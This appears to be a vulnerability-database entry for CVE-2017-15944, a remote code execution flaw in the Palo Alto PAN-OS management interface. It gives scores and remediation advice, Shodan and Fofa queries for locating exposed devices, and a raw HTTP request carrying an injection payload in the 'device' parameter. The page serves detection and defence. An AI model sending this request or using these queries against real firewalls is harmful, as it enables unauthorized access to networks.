🔙 목록으로 돌아가기

CVE-2017-15944: Palo Alto Network PAN-OS - Remote Code Execution

TitlePalo Alto Network PAN-OS - Remote Code Execution
Authoremadshanab,milo2012
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationApply the latest security patches and updates provided by Palo Alto Networks.
CVSS Score9.8
EPSS Score0.94179
CVE IDCVE-2017-15944
Shodan Queryhttp.favicon.hash:"-631559155"cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
Fofa Queryicon_hash="-631559155"
Tags cve2017 cve kev edb rce vpn panos globalprotect paloaltonetworks vkev vuln

🔍 Vulnerability Description

Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.

🌐 HTTP Request

GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Connection: close
Cookie: PHPSESSID=38Ff4GJTVDNcZQC9xo2k1LaZp9r;
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-15944.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-15944.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A